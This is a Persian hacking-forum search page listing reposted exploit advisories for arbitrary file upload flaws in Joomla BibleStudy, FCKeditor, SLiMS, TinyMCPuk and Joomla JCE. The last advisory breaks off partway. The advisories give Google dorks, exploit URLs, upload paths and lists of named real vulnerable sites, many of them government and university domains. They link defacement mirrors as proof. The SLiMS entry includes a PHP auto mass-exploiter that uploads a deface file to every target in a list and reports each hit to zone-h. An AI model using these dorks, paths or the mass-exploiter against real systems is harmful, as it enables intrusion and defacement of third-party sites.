امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'upload'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

50 نتیجه پیدا شد

  1. # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CVE: CVE-2018-7316 # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018090270 # Cyberizm : cyberizm.org/cyberizm-joomla-com-biblestudy-proclaim-mediafileform-exploit.html ################################################################################################# # Google Dork : inurl:''/index.php?option=com_biblestudy'' # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 # Note : Go to the '' Media Files '' Category. Choose your File and Upload it. # Directory File Path : TARGET/images/biblestudy/media/.... ################################################################################################# # Example Vulnerable Sites => kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3 cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  2. # Exploit Title : Developed by Rate it Services Business Solutions Mājas lapu izstrāde FCKeditor Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : rate.lv # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060245 # Cyberizm : cyberizm.org/cyberizm-developed-by-rateit-services-business-solutions-exploit.html ################################################################################################# # Title : Developed by Rate Business Solutions Mājas lapu izstrāde Latvia FCKeditor Remote File Upload Vulnerability # Google Dorks : intext:''Developed by: RATE Business Soltuions'' intext:''Developed By: Mājas lapu izstrāde'' intext:''Developed by: RATE IT SERVICES'' # Exploit : /jscripts/editor/filemanager/connectors/uploadtest.html # Path : /allfiles/... ################################################################################################# # Example Vulnerable Sites : There are 31 domains hosted on this server. => 178.16.24.19 btp.travel/jscripts/editor/filemanager/connectors/uploadtest.html => [ Proof of Concept ] => archive.is/HWzoL => archive.is/s2AaH behold.lv/jscripts/editor/filemanager/connectors/uploadtest.html hotelsinpl.com/jscripts/editor/filemanager/connectors/uploadtest.html bhyper.com/jscripts/editor/filemanager/connectors/uploadtest.html hotelsinwarsaw.eu/jscripts/editor/filemanager/connectors/uploadtest.html gobaltic.com/jscripts/editor/filemanager/connectors/uploadtest.html eursecure.com/jscripts/editor/filemanager/connectors/uploadtest.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  3. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High #CXSecurity : cxsecurity.com/ascii/WLB-2018050260 #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html ############################################################################################################## # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. ############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] Important Note : Only .txt .jpg .gif .png files are allowed. # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/.... ############################################################################################################## # Example Sites : # perpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S # pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP # pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6 pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php pa-kualatungkal.go.id/pustaka/admin/modules/bibliography/pop_attach.php pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php pn-bangil.go.id/perpustakaan/data/admin/modules/bibliography/pop_attach.php pn-tabanan.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php perpustakaan.pn-balige.go.id/admin/modules/bibliography/pop_attach.php docrepository.undana.ac.id/admin/modules/bibliography/pop_attach.php digilib.stimata.ac.id/admin/modules/bibliography/pop_attach.php pustaka.pusair-pu.go.id/akasia/admin/modules/bibliography/pop_attach.php perpustakaan.pn-donggala.go.id/admin/modules/bibliography/pop_attach.php perpustakaan.stikes-paguwarmas.ac.id/admin/modules/bibliography/pop_attach.php opac.staiattanwir.ac.id/repository/admin/modules/bibliography/pop_attach.php opac.lib.idu.ac.id/library_unhan/admin/modules/bibliography/pop_attach.php www.perpustakaanbalitsereal.com/admin/modules/bibliography/pop_attach.php epository.hafshawaty.ac.id/admin/modules/bibliography/pop_attach.php perpusffup.univpancasila.ac.id/admin/modules/bibliography/pop_attach.php perpus.stikesmedikacikarang.ac.id/slim/admin/modules/bibliography/pop_attach.php rbaca.bukitasamfoundation.com/perpustakaan/admin/modules/bibliography/pop_attach.php e-library.darunnajah.ac.id/admin/modules/bibliography/pop_attach.php ############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################
  4. # Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage => mediatechindonesia.com # Google Dork => All rights reserved. © 2015 Media Tech Indonesia # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018050180 # Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html ################################################################################# Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm Please upload your file as => /yourfilename.htm.fla Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla ################################################################################# Example Sites and Target IP => 103.27.206.203 daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406 ################################################################################# Discovered By : KingSkrupellos from Cyberizm.Org #################################################################################
  5. # Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage : joomlacontenteditor.net # Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/ # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200 # Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html ################################################################################# Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter Google Dork [ Example ] => inurl:''/index.php?option=com_jce'' You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain. Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... Office-like functions and familiar buttons make formatting simple Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more... Integrated Spellchecking using your browser's Spellchecker Fine-grained control over the editor layout and features with Editor Profiles Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor Insert multiple images. Create responsive images with the srcset attribute Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension Filemanager => Create links to images, documents, media and other common file types Include a file type icon, file size and modified date Insert as a link or embed the document with an iframe Create downloadable files using the download attribute. Template Manager => Insert pre-defined template content form html or text files Create template snippet files from whole articles or selected content Configure the Template Manager to set the startup content of new articles ################################################################################# Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. The component is prone to a the following security vulnerabilities: 1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script. 2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Affected JCE 2.1.0 is vulnerable; other versions may also be affected. References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481 References => https://www.securityfocus.com/bid/53630 Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT This JCE is well-known by some 